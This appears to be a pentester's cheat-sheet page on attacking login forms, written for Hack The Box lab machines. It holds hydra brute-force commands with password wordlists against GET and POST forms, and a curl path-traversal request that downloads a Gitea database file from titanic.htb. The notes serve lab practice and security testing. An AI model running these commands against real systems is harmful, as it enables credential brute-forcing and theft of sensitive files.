#get and post forms
hydra -f -l ultratech -P /usr/share/wordlists/rockyou.txt [t1] -s 8081 http-get-form "/auth:login=^USER^&password=^PASS^:Invalid credentials" -V -o hydra_results.txt
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt  -P /root/Desktop/wordlists/100-common-passwords.txt [t1] http-post-form "/login:username=^USER^&password=^PASS^:Invalid username or password"
hydra -C userpass.txt streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:F=Login failed" 

curl -X POST <http://t1:31331/partners.html> -H "Host:titanic.htb"-d "username=wrong&password=wrong" -H "Content-Type: application/x-www-form-urlencoded"

curl -X GET "<http://titanic.htb/download?ticket=../../../home/developer/gitea/data/gitea/gitea.db>" \\
-H "Host: titanic.htb" \\
--output gitea.db

• HTB
• IRL Enum

Bug Bounty methodology

• White Box
• Web pentesting
• API attacks

• files to hunt
• default webroots & paths

CMS + common Apps

login forms